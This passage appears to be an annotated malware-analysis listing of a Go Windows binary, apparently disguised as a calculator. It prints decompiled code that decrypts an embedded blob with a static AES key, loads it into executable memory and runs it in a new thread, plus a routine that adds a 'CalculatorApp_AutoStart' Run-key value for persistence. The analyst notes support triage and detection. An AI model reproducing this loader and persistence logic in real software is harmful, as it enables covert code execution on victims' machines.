puVar3 = puVar3 + uVar7 * -2 + 1;
puVar6 = puVar6 + uVar7 * -2 + 1;
}
*(register0x00000020 + -0x88) = 0x47be74;
/* Decrypt the blob with the static 16-byte key; result is (pointer, length). */
/* AES-ECB is inferred from the function name; its body is not part of this listing. */
auVar8 = main.AesDecryptByECB(puVar1, 0x25660, 0x25660, "1ws12uuu11j*p5fr", 0x10);
*(register0x00000020 + -0x38) = auVar8._0_8_;
*(register0x00000020 + -0x50) = auVar8._8_8_;
*(register0x00000020 + -0x88) = 0x47be8f;
/* Run-time resolution of the four kernel32 exports used below. */
uVar2 = syscall.MustLoadDLL("kernel32.dll", 0xc);
*(register0x00000020 + -0x40) = uVar2;
*(register0x00000020 + -0x88) = 0x47bea5;
uVar2 = syscall.(*DLL).MustFindProc(uVar2, "VirtualAlloc", 0xc);
*(register0x00000020 + -0x28) = uVar2;
*(register0x00000020 + -0x88) = 0x47bec5;
uVar2 = syscall.(*DLL).MustFindProc(*(register0x00000020 + -0x40), "RtlMoveMemory", 0xd);
*(register0x00000020 + -0x20) = uVar2;
*(register0x00000020 + -0x88) = 0x47bee5;
uVar2 = syscall.(*DLL).MustFindProc(*(register0x00000020 + -0x40), "CreateThread", 0xc);
*(register0x00000020 + -0x18) = uVar2;
*(register0x00000020 + -0x88) = 0x47bf05;
uVar2 = syscall.(*DLL).MustFindProc(*(register0x00000020 + -0x40), "WaitForSingleObject", 0x13);
*(register0x00000020 + -0x30) = uVar2;
*(register0x00000020 + -0x88) = 0x47bf16;
/* VirtualAlloc argument array: {0, length, 0x3000 (MEM_COMMIT|MEM_RESERVE), 0x40 (PAGE_EXECUTE_READWRITE)}. */
iVar4 = runtime.newobject(0x484b20);
*(iVar4 + 8) = *(register0x00000020 + -0x50);
*(iVar4 + 0x10) = 0x3000;
*(iVar4 + 0x18) = 0x40;
*(register0x00000020 + -0x88) = 0x47bf45;
auVar8 = syscall.(*Proc).Call(*(register0x00000020 + -0x28), iVar4, 4);
/* Only the decrypted length is tested here; the VirtualAlloc result itself is not checked. */
if (*(register0x00000020 + -0x50) != 0) {
*(register0x00000020 + -0x48) = auVar8._0_8_;
*(register0x00000020 + -0x10) = *(register0x00000020 + -0x38);
*(register0x00000020 + -0x88) = 0x47bf6e;
/* RtlMoveMemory argument array: {allocated region, decrypted data, length}. */
puVar3 = runtime.newobject(0x484a60);
*puVar3 = *(register0x00000020 + -0x48);
puVar3[1] = *(register0x00000020 + -0x10);
puVar3[2] = *(register0x00000020 + -0x50);
*(register0x00000020 + -0x88) = 0x47bf9d;
syscall.(*Proc).Call(*(register0x00000020 + -0x20), puVar3, 3);
*(register0x00000020 + -0x88) = 0x47bfa9;
/* CreateThread argument array (6 slots): only offset 0x10, the start address, is non-zero. */
iVar4 = runtime.newobject(0x484c40);
*(iVar4 + 0x10) = *(register0x00000020 + -0x48);
*(iVar4 + 0x18) = in_XMM15;
*(iVar4 + 0x28) = 0;
*(register0x00000020 + -0x88) = 0x47bfd4;
uVar2 = syscall.(*Proc).Call(*(register0x00000020 + -0x18), iVar4, 6, 6);
*(register0x00000020 + -0x58) = uVar2;
*(register0x00000020 + -0x88) = 0x47bfe5;
/* WaitForSingleObject(thread handle, 0xfffffff): a finite timeout, not INFINITE (0xffffffff). */
puVar3 = runtime.newobject(0x484940);
*puVar3 = *(register0x00000020 + -0x58);
puVar3[1] = 0xfffffff;
*(register0x00000020 + -0x88) = 0x47c00a;
syscall.(*Proc).Call(*(register0x00000020 + -0x30), puVar3, 2, 2);
*(register0x00000020 + -0x88) = 0x47c014;
syscall.(*DLL).Release(*(register0x00000020 + -0x40));
return;
}
/* Empty decrypted slice: Go bounds-check failure on index 0. */
*(register0x00000020 + -0x88) = 0x47c028;
runtime.panicIndex(0, auVar8._8_8_, 0);
}
/* Not enough stack: grow it and retry from the top. */
*(puVar5 + -8) = 0x47c02e;
runtime.morestack_noctxt();
register0x00000020 = puVar5;
} while( true );
}
0x47B940 enableAutoStart str 2 api 0 imm 7 Unknown
; main.enableAutoStart: writes a per-user autorun registry value pointing at this executable.
; Steps visible in the listing:
;   1. os.Executable() then path.filepath.abs() to get the program's absolute path
;   2. registry.OpenKey(0x80000001 = HKEY_CURRENT_USER, <45-char path>, access 0x02)
;   3. Key.setStringValue(key, "CalculatorApp_AutoStart", type 1, <exe path>)
;   4. call the deferred closure main.enableAutoStart.func1 (presumably closes the key; body not shown)
; The key path is referenced through the tool's `autorun` label; its length 0x2D matches the
; "Software\Microsoft\Windows\CurrentVersion\Run" string at 0x49C0FD in the strings table.
; Every failure path returns silently, and the setStringValue result is not checked.
; Detection: a value named CalculatorApp_AutoStart under the HKCU Run key is a host indicator for this sample.
main.enableAutoStart() {
; Go prologue: stack-bound check, .4 grows the stack and restarts.
cmp rsp, [r14+0x10]
jbe .4
sub rsp, 0x68
mov [rsp+0x60], rbp
lea rbp, [rsp+0x60]
; Clear the defer slot [rsp+0x58] and the flag byte [rsp+0x37]
; (looks like open-coded defer bookkeeping; see the deferreturn call near the end).
mov r13, 0x00
mov [rsp+0x58], r13
mov byte ptr [rsp+0x37], 0x00
call os.Executable()
; rcx non-zero = error returned -> give up (.3)
test rcx, rcx
jnz .3
nop
call path.filepath.abs()
nop [rax], eax
; rcx non-zero = error returned -> give up (.2)
test rcx, rcx
jnz .2
; Save the absolute path: [rsp+0x50] = pointer, [rsp+0x38] = length.
mov [rsp+0x50], rax
mov [rsp+0x38], rbx
; OpenKey(HKEY_CURRENT_USER, path string of length 0x2D, access = 0x02).
; NOTE(review): 0x02 matches KEY_SET_VALUE (write-only access); confirm against the registry package.
mov eax, 0x80000001
lea rbx, [autorun]
mov ecx, 0x2D
mov edi, 0x02
call golang.org.x.sys.windows.registry.OpenKey()
; rbx zero = no error -> continue at .1; otherwise return without writing anything.
test rbx, rbx
jz .1
mov rbp, [rsp+0x60]
add rsp, 0x68
ret
.1:
; Build the defer record at [rsp+0x40]: {func1, key handle}, publish it in [rsp+0x58],
; and set the flag byte to mark the defer as pending.
movups [rsp+0x40], xmm15
lea rdx, [main.enableAutoStart.func1()]
mov [rsp+0x40], rdx
mov [rsp+0x48], rax
lea rdx, [rsp+0x40]
mov [rsp+0x58], rdx
mov byte ptr [rsp+0x37], 0x01
nop
; setStringValue(key = rax, name "CalculatorApp_AutoStart" (0x17 chars), type = 1,
;                value = executable path pointer/length saved above).
; NOTE(review): type 1 matches REG_SZ.
lea rbx, ["CalculatorApp_AutoStart"]
mov ecx, 0x17
mov edi, 0x01
mov rsi, [rsp+0x50]
mov r8, [rsp+0x38]
nop
call golang.org.x.sys.windows.registry.Key.setStringValue()
; Result ignored. Clear the pending flag and run the deferred closure through its code pointer.
mov byte ptr [rsp+0x37], 0x00
mov rdx, [rsp+0x58]
mov r9, [rdx]
call r9
mov rbp, [rsp+0x60]
add rsp, 0x68
ret
; .2: filepath.abs failed -> plain return
.2:
mov rbp, [rsp+0x60]
add rsp, 0x68
ret
; .3: os.Executable failed -> plain return
.3:
mov rbp, [rsp+0x60]
add rsp, 0x68
ret
; Not reached by fall-through (follows a ret); presumably the panic-path epilogue the Go
; compiler emits for functions with defers. TODO confirm.
call runtime.deferreturn()
mov rbp, [rsp+0x60]
add rsp, 0x68
ret
.4:
call runtime.morestack_noctxt()
jmp main.enableAutoStart()
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of main.enableAutoStart (same function as the disassembly at 0x47B940).
 * It resolves the running executable's absolute path and stores it as the string value
 * "CalculatorApp_AutoStart" under a key opened from root 0x80000001 (HKEY_CURRENT_USER).
 * The decompiler did not recover Go's multi-register returns, so call arguments and results
 * appear as extraout_* variables; read the disassembly for the exact operands.
 */
void main.enableAutoStart(void)
{
undefined8 extraout_RAX;
int64_t extraout_RCX;
int64_t extraout_RCX_00;
undefined8 extraout_RBX;
int64_t unaff_R14;
undefined auVar1 [16];
undefined auStack_28 [16];
undefined8 uStack_18;
code **ppcStack_10;
/* Go stack-growth retry loop, not application logic. */
while (&stack0x00000000 <= *(unaff_R14 + 0x10)) {
runtime.morestack_noctxt();
}
ppcStack_10 = 0x0;
os.Executable();
/* extraout_RCX is the error result of os.Executable; any error ends the function silently. */
if (extraout_RCX != 0) {
return;
}
path.filepath.abs();
/* Same for the error result of filepath.abs. */
if (extraout_RCX_00 != 0) {
return;
}
/* uStack_18 = pointer to the absolute path string; extraout_RBX below carries its length. */
uStack_18 = extraout_RAX;
/* OpenKey(root 0x80000001, key path of length 0x2d, access 2); high half of the result is the error. */
auVar1 = golang.org.x.sys.windows.registry.OpenKey(0x80000001, &autorun, 0x2d, 2);
if (auVar1._8_8_ != 0) {
return;
}
/* Deferred closure record: {main.enableAutoStart.func1, key handle}. */
auStack_28._8_8_ = auVar1._0_8_;
auStack_28._0_8_ = main.enableAutoStart.func1;
ppcStack_10 = auStack_28;
/* Write value name (0x17 chars), type 1, data = executable path. The result is not checked. */
golang.org.x.sys.windows.registry.Key.setStringValue(auVar1._0_8_, "CalculatorApp_AutoStart", 0x17, 1, uStack_18, extraout_RBX);
/* Run the deferred closure (presumably closes the key; func1's body is not in this listing). */
(**ppcStack_10)();
return;
}
0x436D00 badctxt str 1 api 0 imm 3 Unknown
; runtime.badctxt: Go runtime helper, not sample-specific logic. It sets up a small frame and
; calls runtime.throw with the 9-byte message "ctxt != 0". There is no ret after the call,
; which is consistent with runtime.throw not returning.
; NOTE(review): its presence under "high-value functions" is presumably a scoring artefact of
; the tool; it carries no indicator value for triage.
runtime.badctxt() {
sub rsp, 0x18
mov [rsp+0x10], rbp
lea rbp, [rsp+0x10]
; rax/ebx = message pointer and length (0x09)
lea rax, ["ctxt != 0"]
mov ebx, 0x09
call runtime.throw()
nop
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of runtime.badctxt. The disassembly of this function at 0x436D00 consists
 * only of a call to runtime.throw("ctxt != 0") with no return instruction after it.
 * NOTE(review): everything after the first runtime.throw call below appears to be the
 * decompiler running past the end of badctxt into adjacent runtime code, because it does not
 * treat runtime.throw as non-returning. The "allgadd: bad status Gidle" message suggests the
 * neighbouring function is runtime.allgadd; confirm function boundaries in a disassembler
 * before relying on this body. Bracketed [0x0x...] operands and bare 000000000054f... names
 * are the tool's rendering of global addresses.
 */
void runtime.badctxt(void)
{
undefined8 uVar1;
int64_t iVar2;
int64_t extraout_RAX;
uint64_t extraout_RCX;
undefined8 extraout_RBX;
int64_t iVar3;
undefined *puVar4;
undefined *puVar5;
undefined *puVar6;
int64_t unaff_R14;
undefined auVar7 [16];
undefined auStack_18 [16];
puVar6 = &stack0xfffffffffffffff8;
/* The whole of badctxt: report a fatal runtime error. */
iVar2 = runtime.throw("ctxt != 0", 9);
/* From here on: presumed fall-through into the next function (see the header note). */
puVar4 = auStack_18;
do {
puVar5 = puVar4;
/* Stack-bound check of the fallen-into function. */
if (*(unaff_R14 + 0x10) < puVar4) {
puVar5 = puVar4 + -0x50;
*(puVar4 + -8) = puVar6;
puVar6 = puVar4 + -8;
if (*(iVar2 + 0x90) != 0) {
*(puVar4 + 8) = iVar2;
*(puVar4 + -0x58) = 0x436d5b;
/* Take the runtime lock at 0x5a2388 around the update of the globals at 0x54f460..0x54f470. */
runtime.lock2(0x5a2388);
auVar7._8_8_ = [0x0x54f468] + 1U;
auVar7._0_8_ = [0x0x54f460];
iVar2 = [0x0x54f460];
/* Grow the backing array when the new count exceeds the value stored at 0x54f470. */
if ([0x0x54f470] < [0x0x54f468] + 1U) {
*(puVar4 + -0x58) = 0x436d89;
runtime.growslice();
auVar7._8_8_ = extraout_RBX;
auVar7._0_8_ = extraout_RAX;
iVar2 = extraout_RAX;
000000000054f470 = extraout_RCX;
if ([0x0x5a2550] != 0) {
*(puVar4 + -0x58) = 0x436dae;
auVar7 = runtime.gcWriteBarrier();
iVar2 = [0x0x54f460];
}
}
[0x0x54f460] = iVar2;
000000000054f468 = auVar7._8_8_;
/* Store the saved argument in the last slot, via a GC write barrier when [0x5a2550] is set. */
if ([0x0x5a2550] == 0) {
*(auVar7._0_8_ + -8 + 000000000054f468 * 8) = *(puVar4 + 8);
}
else {
*(puVar4 + -0x58) = 0x436ddc;
runtime.gcWriteBarrierDX();
}
if ([0x0x54f468] != 0) {
iVar2 = [0x0x54f460];
if ([0x0x54f010] != [0x0x54f460]) {
iVar3 = [0x0x54f460];
if ([0x0x5a2550] != '\0') {
*(puVar4 + -0x10) = [0x0x54f460];
*(puVar4 + -0x58) = 0x436e13;
runtime.atomicwb(0x54f010);
iVar3 = *(puVar4 + -0x10);
}
/* LOCK()/UNLOCK() are the decompiler's markers for lock-prefixed (atomic) instructions. */
LOCK();
UNLOCK();
iVar2 = [0x0x54f010];
000000000054f010 = iVar3;
}
uVar1 = [0x0x5a2380];
LOCK();
[0x0x5a2380] = [0x0x54f468];
UNLOCK();
*(puVar4 + -0x58) = 0x436e45;
runtime.unlock2(0x5a2388, iVar2, uVar1);
return;
}
*(puVar4 + -0x58) = 0x436e59;
runtime.panicIndex(0, [0x0x54f460], 0);
}
*(puVar4 + -0x58) = 0x436e6a;
iVar2 = runtime.throw("allgadd: bad status Gidle", 0x19);
}
/* Not enough stack: grow it and retry, preserving the argument across the call. */
*(puVar5 + 8) = iVar2;
*(puVar5 + -8) = 0x436e75;
runtime.morestack_noctxt();
iVar2 = *(puVar5 + 8);
puVar4 = puVar5;
} while( true );
}
0x459120 morestackc str 1 api 0 imm 3 Unknown
; runtime.morestackc: Go runtime helper, not sample-specific logic. It sets up a small frame
; and calls runtime.throw with the 0x32-byte message
; "attempt to execute system stack code on user stack". No ret follows the call, which is
; consistent with runtime.throw not returning.
; NOTE(review): the decompiled body printed for this function is much longer than these
; instructions; it presumably continues into adjacent runtime code. Trust this listing for
; the function's real extent.
runtime.morestackc() {
sub rsp, 0x18
mov [rsp+0x10], rbp
lea rbp, [rsp+0x10]
; rax/ebx = message pointer and length (0x32)
lea rax, ["attempt to execute system stack code on user stack"]
mov ebx, 0x32
call runtime.throw()
nop
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of runtime.morestackc. Only the runtime.throw() call below
 * corresponds to the short disassembly listing for 0x459120. The do/while loop
 * after it saves return addresses in the 0x459205-0x4595d9 range, well past
 * that listing, so it appears to be the body of the next function in the image,
 * reached because the decompiler did not treat runtime.throw as non-returning.
 * Confirm the function boundaries before attributing this logic to morestackc.
 * The run-on body takes a lock, looks a key up in a map, caps a counter at 2000
 * and returns an address inside runtime.callbackasm, which looks like the Go
 * runtime's Windows callback registration path (stock runtime code; TODO
 * confirm against the matching Go release).
 */
code * runtime.morestackc(void)
{
uint16_t uVar1;
int64_t extraout_RAX;
undefined8 *puVar2;
int64_t iVar3;
undefined uVar4;
uint8_t uVar5;
undefined extraout_CL;
uint64_t extraout_RCX;
int64_t iVar6;
int64_t iVar7;
uint64_t uVar8;
uint64_t uVar9;
char extraout_BL;
undefined8 extraout_RBX;
undefined8 uVar10;
undefined *puVar11;
undefined *puVar12;
undefined *puVar13;
uint64_t extraout_RSI;
uint64_t uVar14;
uint64_t extraout_R8;
int64_t unaff_R14;
bool bVar15;
undefined in_XMM15 [16];
undefined auVar16 [16];
undefined auStack_18 [16];
puVar13 = &stack0xfffffffffffffff8;
/* The whole of morestackc as disassembled: a fatal throw with a fixed message. */
runtime.throw("attempt to execute system stack code on user stack", 0x32);
/* Everything from here on is the suspected run-on into the following function. */
iVar3 = extraout_RAX;
uVar14 = extraout_RCX;
uVar10 = extraout_RBX;
puVar11 = auStack_18;
do {
auVar16._8_8_ = uVar10;
auVar16._0_8_ = iVar3;
uVar4 = uVar14;
puVar12 = puVar11;
/* Stack-limit check against *(R14 + 0x10); the failing side ends in runtime.morestack_noctxt(). */
if (*(unaff_R14 + 0x10) < puVar11 + -0x78) {
puVar12 = puVar11 + -0xf8;
*(puVar11 + -8) = puVar13;
puVar13 = puVar11 + -8;
*(puVar11 + 8) = iVar3;
*(puVar11 + 0x10) = uVar10;
/* Tests a 5-bit tag at +0x17 of the first argument for the value 0x13; presumably a Go type-kind check -- confirm. */
if ((iVar3 != 0) && ((*(iVar3 + 0x17) & 0x1f) == 0x13)) {
*(puVar11 + -0x98) = in_XMM15;
*(puVar11 + -0x88) = in_XMM15;
*(puVar11 + -0x78) = in_XMM15;
*(puVar11 + -0x68) = in_XMM15;
if ((*(iVar3 + 0x14) & 1) == 0) {
iVar6 = 0x38;
}
else {
iVar6 = 0x48;
}
uVar14 = *(iVar3 + 0x30);
iVar6 = iVar6 + iVar3;
if (uVar14 < 0x100001) {
*(puVar11 + -0xb0) = iVar3;
*(puVar11 + -0xc0) = iVar6;
*(puVar11 + -0xb8) = uVar10;
*(puVar11 + -200) = uVar14;
iVar7 = 0;
/* One assignArg call per entry of the 8-byte-stride table that starts at iVar6. */
while (iVar7 < uVar14) {
*(puVar11 + -0xd0) = iVar7;
uVar10 = *(iVar6 + iVar7 * 8);
*(puVar11 + -0x100) = 0x459205;
runtime.(*abiDesc).assignArg(puVar11 + -0x98, uVar10);
iVar3 = *(puVar11 + -0xb0);
uVar10 = *(puVar11 + -0xb8);
uVar14 = *(puVar11 + -200);
iVar6 = *(puVar11 + -0xc0);
iVar7 = *(puVar11 + -0xd0) + 1;
}
/* Round the running size up to a multiple of 8. */
uVar9 = *(puVar11 + -0x78) + 7U & 0xfffffffffffffff8;
*(puVar11 + -0x78) = uVar9;
*(puVar11 + -0x60) = uVar9;
uVar1 = *(iVar3 + 0x30);
uVar14 = uVar1;
uVar8 = (*(iVar3 + 0x32) & 0x7fff) + uVar1 & 0xffff;
if (uVar14 <= uVar8) {
uVar14 = uVar14 - 0x100000 >> 0x3f & uVar14 << 3;
if (uVar8 - uVar1 == 1) {
if ((*(iVar3 + 0x14) & 1) == 0) {
iVar6 = 0x38;
}
else {
iVar6 = 0x48;
}
if (**(iVar6 + iVar3 + uVar14) == 8) {
if ((*(iVar3 + 0x14) & 1) == 0) {
iVar6 = 0x38;
}
else {
iVar6 = 0x48;
}
uVar5 = *(*(iVar6 + iVar3 + uVar14) + 0x17) & 0x1f;
if ((uVar5 != 0xd) && (uVar5 != 0xe)) {
if ([0x0x52f3a8] == 0) {
*(puVar11 + -0x78) = uVar9 + 8;
}
if ((*(puVar11 + -0x78) + 7U & 0xfffffffffffffff8) + *(puVar11 + -0x70) < 0x201) {
*(puVar11 + -0xa8) = 0;
puVar11[-0xa0] = 0;
*(puVar11 + -0xa8) = uVar10;
puVar11[-0xa0] = 0;
*(puVar11 + -0x100) = 0x459354;
/* The lock at 0x57b1a0 is held across the map lookup and the insert below. */
runtime.lock2(0x57b1a0);
*(puVar11 + -0x100) = 0x45936c;
puVar2 = runtime.mapaccess2(0x486920, [0x0x5a22a8], puVar11 + -0xa8);
/* Key already present: reuse its stored index and return callbackasm + index * 5. */
if (extraout_BL != '\0') {
*(puVar11 + -0xd8) = *puVar2;
*(puVar11 + -0x100) = 0x4594f9;
runtime.unlock2(0x57b1a0);
return runtime.callbackasm + *(puVar11 + -0xd8) * 5;
}
iVar3 = [0x0x5a22a8];
/* Map global is created on first use. */
if ([0x0x5a22a8] == 0) {
*(puVar11 + -0x100) = 0x459387;
iVar3 = runtime.makemap_small();
if ([0x0x5a2550] != 0) {
*(puVar11 + -0x100) = 0x4593a5;
runtime.gcWriteBarrier();
iVar3 = [0x0x5a22a8];
}
}
[0x0x5a22a8] = iVar3;
/* Hard cap: at most 2000 entries, otherwise the throw further down. */
bVar15 = [0x0x5a22b0] < 2000;
if ([0x0x5a22b0] < 2000) {
*(puVar11 + -0x108) = puVar13;
*(puVar11 + -0x100) = 0x4593d3;
auVar16 = func_0x0045d5f0();
iVar3 = auVar16._0_8_;
puVar13 = *(puVar11 + -0x108);
*(puVar11 + -0x58) = *(puVar11 + -0xa8);
*(puVar11 + -0x48) = *(puVar11 + -0x98);
*(puVar11 + -0x44) = *(puVar11 + -0x94);
*(puVar11 + -0x40) = *(puVar11 + -0x90);
*(puVar11 + -0x3c) = *(puVar11 + -0x8c);
*(puVar11 + -0x38) = *(puVar11 + -0x88);
*(puVar11 + -0x34) = *(puVar11 + -0x84);
*(puVar11 + -0x30) = *(puVar11 + -0x80);
*(puVar11 + -0x2c) = *(puVar11 + -0x7c);
*(puVar11 + -0x28) = *(puVar11 + -0x78);
*(puVar11 + -0x24) = *(puVar11 + -0x74);
*(puVar11 + -0x20) = *(puVar11 + -0x70);
*(puVar11 + -0x1c) = *(puVar11 + -0x6c);
*(puVar11 + -0x18) = *(puVar11 + -0x68);
*(puVar11 + -0x14) = *(puVar11 + -100);
*(puVar11 + -0x10) = *(puVar11 + -0x60);
*(puVar11 + -0xc) = *(puVar11 + -0x5c);
if (bVar15) {
*(puVar11 + -0xe0) = iVar3;
*(puVar11 + -200) = iVar3 * 5;
if ([0x0x5a2550] == 0) {
*(puVar11 + -0x108) = puVar13;
*(puVar11 + -0x100) = 0x45946f;
func_0x0045d95a();
}
else {
*(puVar11 + -0x100) = 0x45948c;
/* Copies the record into a table of 0x50-byte slots based at 0x57b1a8. */
runtime.typedmemmove
(0x48c200, iVar3 * 0x50 + 0x57b1a8, puVar11 + -0x58);
}
*(puVar11 + -0x100) = 0x4594a5;
puVar2 = runtime.mapassign(0x486920, [0x0x5a22a8],
puVar11 + -0xa8);
*puVar2 = *(puVar11 + -0xe0);
[0x0x5a22b0] = [0x0x5a22b0] + 1;
*(puVar11 + -0x100) = 0x4594c5;
runtime.unlock2(0x57b1a0);
return runtime.callbackasm + *(puVar11 + -200);
}
*(puVar11 + -0x100) = 0x459527;
runtime.panicIndex(iVar3, auVar16._8_8_, 2000);
}
*(puVar11 + -0x100) = 0x459536;
runtime.unlock2(0x57b1a0);
*(puVar11 + -0x100) = 0x459547;
runtime.throw("too many callback functions", 0x1b);
}
/* The gopanic calls below show "\u25ba" where the panic value was not rendered by the tool. */
*(puVar11 + -0x100) = 0x45955a;
runtime.gopanic("\u25ba", 0x4b1da0);
}
*(puVar11 + -0x100) = 0x45956d;
runtime.gopanic("\u25ba", 0x4b1d90);
}
*(puVar11 + -0x100) = 0x459585;
runtime.gopanic("\u25ba", 0x4b1d80);
}
*(puVar11 + -0x100) = 0x459598;
runtime.gopanic("\u25ba", 0x4b1d80);
uVar14 = extraout_R8;
}
*(puVar11 + -0x100) = 0x4595a5;
auVar16 = runtime.panicSliceB(uVar14 & 0xffffffff);
uVar14 = extraout_RSI;
}
*(puVar11 + -0x100) = 0x4595b2;
runtime.panicSliceAlen(auVar16._0_8_, auVar16._8_8_, uVar14);
}
*(puVar11 + -0x100) = 0x4595c5;
auVar16 = runtime.gopanic("\u25ba", 0x4b1d80);
uVar4 = extraout_CL;
}
/* Stack-growth path: spill the live values, call morestack_noctxt, reload and retry the loop. */
*(puVar12 + 8) = auVar16;
puVar12[0x18] = uVar4;
*(puVar12 + -8) = 0x4595d9;
runtime.morestack_noctxt();
iVar3 = *(puVar12 + 8);
uVar10 = *(puVar12 + 0x10);
uVar14 = puVar12[0x18];
puVar11 = puVar12;
} while( true );
/* listing truncated */
0x46F940 Error str 1 api 0 imm 2 Unknown
; internal.poll.errNetClosing.Error: returns a constant error string.
; Go standard-library code; the string is not a sample-specific indicator.
internal.poll.errNetClosing.Error() {
lea rax, ["use of closed network connection"] ; rax = string pointer
mov ebx, 0x20 ; rbx = string length (0x20 = 32 bytes)
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of internal.poll.errNetClosing.Error: returns a 16-byte
 * pair made of the constant message pointer (low half) and its length 0x20
 * (high half), matching the rax/rbx pair set in the disassembly.
 */
undefined [16] internal.poll.errNetClosing.Error(void)
{
undefined auVar1 [16];
auVar1._8_8_ = 0x20;
auVar1._0_8_ = "use of closed network connection";
return auVar1;
}
0x45E540 EntryPoint str 0 api 1 imm 0 Unknown
; EntryPoint: the PE entry point is a single tail jump into the Go runtime
; bootstrap (_rt0_amd64). No sample-specific code runs at the entry point itself.
EntryPoint() {
jmp _rt0_amd64()
}
/* WARNING: Removing unreachable block (ram,0x0045a9c6) */
/* WARNING: Removing unreachable block (ram,0x0045a99b) */
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of EntryPoint. The disassembly for 0x45E540 is a single jmp,
 * and the return addresses saved below are in the 0x45aa04-0x45aab4 range, so
 * this body is the jump target inlined by the decompiler, not code located at
 * the entry point. What is visible is runtime start-up: CPUID probing, TLS
 * set-up with a self-test, then runtime.check/args/osinit/schedinit, newproc
 * and mstart. Nothing in this listing is specific to the sample.
 */
void EntryPoint(void)
{
int32_t *piVar1;
undefined4 *puVar2;
uint32_t uVar3;
undefined8 uVar4;
code *pcVar5;
int32_t iVar6;
uint64_t uVar7;
uint64_t extraout_RBX;
int64_t in_GS_OFFSET;
undefined4 unaff_retaddr;
undefined auStack_ffc8 [65416];
undefined8 uStack_40;
undefined8 uStack_38;
undefined4 auStack_30 [2];
undefined *puStack_28;
undefined4 uStack_18;
undefined *puStack_10;
puStack_10 = &stack0x00000008;
puRam000000000054f808 = auStack_30;
pcRam000000000054f800 = auStack_ffc8;
/* CPUID leaf 0: maximum leaf and vendor string. */
piVar1 = cpuid_basic_info(0);
uVar3 = piVar1[1];
iVar6 = piVar1[3];
if (*piVar1 != 0) {
/* The three constants are the ASCII dwords "Genu" "ineI" "ntel"; a match sets a flag byte at 0x5a22ca. */
/* This is a CPU-vendor flag for the runtime, not a hypervisor or sandbox probe. */
if (((uVar3 == 0x756e6547) && (piVar1[2] == 0x49656e69)) && (iVar6 == 0x6c65746e)) {
[0x0x5a22ca] = 1;
}
/* CPUID leaf 1: the first result dword is stored at 0x5a232c. */
puVar2 = cpuid_Version_info(1);
00000000005a232c = *puVar2;
uVar3 = puVar2[1];
iVar6 = puVar2[3];
}
uVar7 = uVar3;
pcVar5 = 0x54eea0;
puVar2 = auStack_30;
pcRam000000000054f818 = pcRam000000000054f800;
uStack_18 = unaff_retaddr;
/* Optional hook called with setg_gcc as an argument; presumably the cgo initialiser slot. */
/* The comparison reads as constant-vs-zero because casts and dereferences are not printed -- confirm in the disassembly. */
if (0x54eea0 != 0x0) {
uStack_38 = 0x45aa04;
pcRam000000000054f810 = pcRam000000000054f800;
pcRam000000000054f818 = pcRam000000000054f800;
(*0x54eea0)(0x54eea0, uVar7, 0x54f800, 0x54f800, setg_gcc, 0x5a24c8, 0);
iVar6 = 0x54f800;
pcVar5 = 0x54f800 + 0x13a0;
uVar7 = extraout_RBX;
puVar2 = 0x54f808;
pcRam000000000054f818 = pcVar5;
}
0x54f808 = puVar2;
uStack_38 = 0x45aa21;
pcRam000000000054f810 = 0x54f818;
runtime.wintls(pcVar5, uVar7, iVar6);
uStack_38 = 0x45aa2d;
runtime.settls();
/* TLS self-test: write the marker 0x123 through the GS-relative slot and abort if the readback differs. */
**(in_GS_OFFSET + [0x0x5a24c8]) = 0x123;
if ([0x0x54fbf8] != 0x123) {
uStack_38 = 0x45aa53;
runtime.abort();
}
/* The same slot is then pointed at 0x54f800, and the structures at 0x54f800 and 0x54fba0 are linked to each other. */
**(in_GS_OFFSET + [0x0x5a24c8]) = 0x54f800;
[0x0x54fba0] = 0x54f800;
[0x0x54f830] = 0x54fba0;
uStack_38 = 0x45aa7c;
runtime.check();
auStack_30[0] = uStack_18;
puStack_28 = puStack_10;
uStack_38 = 0x45aa92;
runtime.args();
uStack_38 = 0x45aa97;
runtime.osinit();
uStack_38 = 0x45aa9c;
runtime.schedinit();
/* 0x4b1c90 is placed on the stack for newproc; presumably the function value for the main goroutine -- confirm. */
uStack_38 = 0x4b1c90;
uStack_40 = 0x45aaa9;
runtime.newproc();
uVar4 = uStack_38;
uStack_38 = 0x45aaaf;
runtime.mstart(uVar4);
/* Reaching this point means mstart came back; the runtime aborts. */
uStack_38 = 0x45aab4;
runtime.abort();
return;
}
0x44A5E0 fastrand str 0 api 0 imm 14 Unknown
; runtime.fastrand: Go runtime pseudo-random generator (add a constant to the
; state, 64x64->128 multiply, fold high and low halves). The two 64-bit
; immediates match the wyrand generator; they are PRNG constants, not key
; material, and the output is not cryptographically secure.
; In:    r14 = current goroutine pointer (state is reached via [r14+0x30])
; Out:   rax = random value
; Clobb: rbx, rcx, rdx, flags
runtime.fastrand() {
mov rcx, [r14+0x30] ; rcx = structure that owns the generator state
mov rax, 0xA0761D6478BD642F
add rax, [rcx+0xF0] ; rax = state + constant (the new state)
mov rdx, 0xE7037ED1A0B428DB
xor rdx, rax ; rdx = new state ^ second constant
mov rbx, rax ; keep the new state, since mul overwrites rax
mul rdx ; rdx:rax = new state * (new state ^ constant)
mov [rcx+0xF0], rbx ; store the new state
xor rax, rdx ; result = low half ^ high half of the product
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of runtime.fastrand: adds 0xa0761d6478bd642f to the 64-bit
 * state at *(*(R14 + 0x30) + 0xf0), stores the sum back as the new state, and
 * returns the XOR of the low and high 64-bit halves of the 128-bit product
 * state * (state ^ 0xe7037ed1a0b428db). Runtime PRNG, not suitable for and
 * not evidence of key generation.
 */
uint64_t runtime.fastrand(void)
{
undefined auVar1 [16];
undefined auVar2 [16];
uint64_t uVar3;
int64_t unaff_R14;
uVar3 = *(*(unaff_R14 + 0x30) + 0xf0) + 0xa0761d6478bd642f;
/* auVar1 and auVar2 are the two multiplicands widened to 128 bits. */
auVar1._8_8_ = 0;
auVar1._0_8_ = uVar3;
auVar2._8_8_ = 0;
auVar2._0_8_ = uVar3 ^ 0xe7037ed1a0b428db;
*(*(unaff_R14 + 0x30) + 0xf0) = uVar3;
/* SUB168(x, 0) / SUB168(x, 8): low / high 8 bytes of the 16-byte product. */
